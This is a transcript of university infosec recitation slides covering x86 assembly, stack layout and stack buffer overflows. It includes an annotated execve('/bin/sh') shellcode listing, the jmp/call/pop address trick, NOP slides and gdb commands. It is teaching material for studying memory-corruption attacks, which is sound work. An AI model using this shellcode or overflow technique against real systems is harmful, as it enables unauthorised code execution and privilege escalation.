Presentation is loading. Please wait.

Presentation is loading. Please wait.

Introduction to InfoSec – Recitation 2 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Published byMatilda Robbins Modified over 8 years ago

Similar presentations

Presentation on theme: "Introduction to InfoSec – Recitation 2 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)"— Presentation transcript:

1 Introduction to InfoSec – Recitation 2 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

2 Today More assembly tips Review of the stack Stack overflows Implementation o Tools

3 Endian-ity is the definition of how numbers are represented in memory (or on a data bus) In the x86 architecture 0x11223344 would be represented in memory: o 44 33 22 11 Intel Architecture is little endian. (we are using little) However the same number in Big Endian would be: o 11 22 33 44 (we don’t see the bit reordering because our minimum working unit is a byte) Little vs Big Endian

4 Registers Common uses: eax – used usually for fast calculations / system call numbers /used to pass the return value or self class in c++. ecx – used as a counter frequently. ebp – used to store the stack frame pointer esp – used to store the stack pointer edi/esi – used for string/buffer manipulations ip – used to store the current instruction pointer – can not be accessed directly!

5 More on register functionality Most registers can be (CPU-wise) variably be used for different purposes. However, Some register can not be used with certain commands. Example: o mov eip, 0xaddress ; this command is impossible. o loop some_label ;works only with ecx. EIP specifically can’t be manipulated directly at all. instead we use: jmp, call, ret to manipulate it.

6 x86 stack manipulation The x86 stack location is noted by ESP (EBP has no direct role). There are two commands to manipulate the stack: o push 0ximmediate push reg push [from memory] o pop reg However the stack can also be manipulated directly, eg.: o mov [esp+10h], 4 o mov [ebp-15h], 0

7 x86 alternative instructions There are lots of assembly instructions with varying sizes, and they can be used alternatively to fit certain constraints. Compilers use alternative ways for optimization purposes: o Some opcodes take up less space in memory. o Some code shortcuts can be made. Examples: o add esp,4 push eax o Alternatively: o mov [esp-4], eax o mov eax, 0 o Alternatively: o xor eax,eax There are also 8 bit commands to access partial registers o mov al, 5 There are 16 bit commands o mov ax, 65535

8 Buffer’Os History: o First documented buffer overflows were thought of in 1972 COMPUTER SECURITY TECHNOLOGY PLANNING STUDY (Page 61)COMPUTER SECURITY TECHNOLOGY PLANNING STUDY o The first buffer overflows known in the wild were Stack’Os o Stack Overflows were widely introduced by Aleph One Phrack Magazine Issue 49 on November 8, 1996 o Title: Smashing the stack for fun and profit o http://www.phrack.org/issues.html?issue=49&id=14#article http://www.phrack.org/issues.html?issue=49&id=14#article Purpose: o Like when patching, we re-route the code to new code which adds new functionality. o We modify the behavior of a program without modifying the binary, and only by controlling the input! o Therefore we can subvert the original functionality of the code to any purpose.

9 Where does it get really interesting When the program input is from a remote connection o Example: telnet When the program has higher privileges o Example: su

10 Executable in Disk This is how the program appears on disk. The operating system loader loads the file and maps it into program memory. Loader maps the file to memory according to instructions defined in the ELF file. Loader creates new memory section such as the ‘Stack’. Loader calls the start of the program

11 Process Memory Abstract /------------------\ lower | | memory | Text | addresses | | |------------------| | (Initialized) | | Data | | (Uninitialized) | |------------------| | | | Stack | higher | | memory \------------------/ addresses

12 Example1.c void function(int a, int b, int c) { char buffer1[5]; char buffer2[10]; } void main() { function(1,2,3); }

13 Stack Structure bottom of top of memory memory buffer2 buffer1 sfp ret a b c <------ [ ][ ][ ][ ][ ][ ][ ] top of bottom of stack stack Our purpose is to overflow from buffer2 until we reach “ret” so that we point EIP to an arbitrary location of our choosing.

14 shellcode example made simple allocate “/bin/sh” call execv(“/bin/sh”, NULL); call exit(exit_code); We will use system calls (interrupt 0x80) Unlike call interrupt arguments are passed via the registers: o mov eax, 0xb ; execv system call o mov ebx, [addr to “/bin/sh” ] o mov ecx, 0 ; NULL o Int 0x80

15 Allocating “/bin/sh” Not knowing where our code is located presents a challenge, since we know its is located somewhere near EIP, but we can read EIP directly instead we use the following “trick”: jmp end end: pop ebx ; Now ebx will hold the address to “/bin/sh” call beginning.string “/bin/sh”

16 shellcode example with interrupt calls jmp call_start # jump to the end of the code to /bin/sh start_shellcode: # label to jump back pop ebx # put point to /bin/sh in ebx xor eax,eax # zero eax, but dont use mov, because it include \x00 mov al, 0xb # system call 0xb, - execve xor ecx, ecx # clear pointer to envp int 0x80 # call a system call! xor eax,eax # ignore return and reset to zero. mov al, 0x1 # call exit system call int 0x80 call_start: call start_shellcode.string "/bin/sh"

17 Shellcode In the exercise, shellcode will be provided for you, there is no need to compile it, simply use it “as is”.

18 NOP Slide Slides EIP to beginning of code. Avoids from Illegal Instruction Protects against stack differences CPU/EIP NOP Start Shellcode Start

19 Stack’o Example Demo

20 Tools List gdb – GNU Debugger o Core dump analysis: gdb –core=core.dump o Ollydbg – (for windows) which we will not cover in the course. IDA o va_to_offset.py – easy program to get offset of code in orig file. ghex – can be used to patch the binary : o Once we have a search string to find the binary code, we can modify it Other common tools for linux debugging: o ltrace – library tracing o strace – system call tracing o objdump – dump elf file and symbol information o strings – can be used to view strings inside a binary. shellcode

21 GDB Quick browse Running gdb: o gdb./executable o gdb –args=“./executable [params]” o gdb –core=[core_file_name] r arg1 arg2 – runs the file with the specified arguments si, ni – step instruction s, n – step info reg – print all registers dump memory filename startaddress stopaddress x/i address – disassemble at this address p (char *) 0x234234 – print at this address as if it was a c-string. x/bx address – print hex starting from this address c – continue b somefunction – sets a breakpoint

22 The end

Download ppt "Introduction to InfoSec – Recitation 2 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)"

Similar presentations

Practical Malware Analysis

Practical Malware Analysis
Smashing the Stack for Fun and Profit

Smashing the Stack for Fun and Profit
Exploring Security Vulnerabilities by Exploiting Buffer Overflow using the MIPS ISA Andrew T. Phillips Jack S. E. Tan Department of Computer Science University.

Exploring Security Vulnerabilities by Exploiting Buffer Overflow using the MIPS ISA Andrew T. Phillips Jack S. E. Tan Department of Computer Science University.
Introduction to Information Security ROP – Recitation 5 nirkrako at post.tau.ac.il itamarg at post.tau.ac.il.

Introduction to Information Security ROP – Recitation 5 nirkrako at post.tau.ac.il itamarg at post.tau.ac.il.
Gnu Debugger (GDB) Topics Overview Quick Reference Card Readings: Quick Reference Card February 7, 2012 CSCE 212Honors Computer Organization.

Gnu Debugger (GDB) Topics Overview Quick Reference Card Readings: Quick Reference Card February 7, 2012 CSCE 212Honors Computer Organization.
C Programming and Assembly Language Janakiraman V – NITK Surathkal 2 nd August 2014.

C Programming and Assembly Language Janakiraman V – NITK Surathkal 2 nd August 2014.
Debugging What can debuggers do? Run programs Make the program stops on specified places or on specified conditions Give information about current variables’

Debugging What can debuggers do? Run programs Make the program stops on specified places or on specified conditions Give information about current variables’
1 ICS 51 Introductory Computer Organization Fall 2006 updated: Oct. 2, 2006.

1 ICS 51 Introductory Computer Organization Fall 2006 updated: Oct. 2, 2006.
1 Function Calls Professor Jennifer Rexford COS 217 Reading: Chapter 4 of “Programming From the Ground Up” (available online from the course Web site)

1 Function Calls Professor Jennifer Rexford COS 217 Reading: Chapter 4 of “Programming From the Ground Up” (available online from the course Web site)
Accessing parameters from the stack and calling functions.

Accessing parameters from the stack and calling functions.
1 Homework Reading –PAL, pp 201-216, 297-312 Machine Projects –Finish mp2warmup Questions? –Start mp2 as soon as possible Labs –Continue labs with your.

1 Homework Reading –PAL, pp , Machine Projects –Finish mp2warmup Questions? –Start mp2 as soon as possible Labs –Continue labs with your.
September 22, 2014 Pengju (Jimmy) Jin Section E

September 22, 2014 Pengju (Jimmy) Jin Section E
15-213 Recitation: Bomb Lab June 5, 2015 Dipayan Bhattacharya.

Recitation: Bomb Lab June 5, 2015 Dipayan Bhattacharya.
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-

Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
Introduction to InfoSec – Recitation 2 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Introduction to InfoSec – Recitation 2 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.

CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.
Fall 2008CS 334: Computer SecuritySlide #1 Smashing The Stack A detailed look at buffer overflows as described in Smashing the Stack for Fun and Profit.

Fall 2008CS 334: Computer SecuritySlide #1 Smashing The Stack A detailed look at buffer overflows as described in Smashing the Stack for Fun and Profit.
Lecture 6: Buffer Overflow CS 436/636/736 Spring 2014 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)

Lecture 6: Buffer Overflow CS 436/636/736 Spring 2014 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)
Carnegie Mellon Introduction to Computer Systems 15-213/18-243, spring 2009 Recitation, Jan. 14 th.

Carnegie Mellon Introduction to Computer Systems /18-243, spring 2009 Recitation, Jan. 14 th.
1 Carnegie Mellon Stacks 15-213: Introduction to Computer Systems Recitation 5: September 24, 2012 Joon-Sup Han Section F.

1 Carnegie Mellon Stacks : Introduction to Computer Systems Recitation 5: September 24, 2012 Joon-Sup Han Section F.

Similar presentations

Ads by Google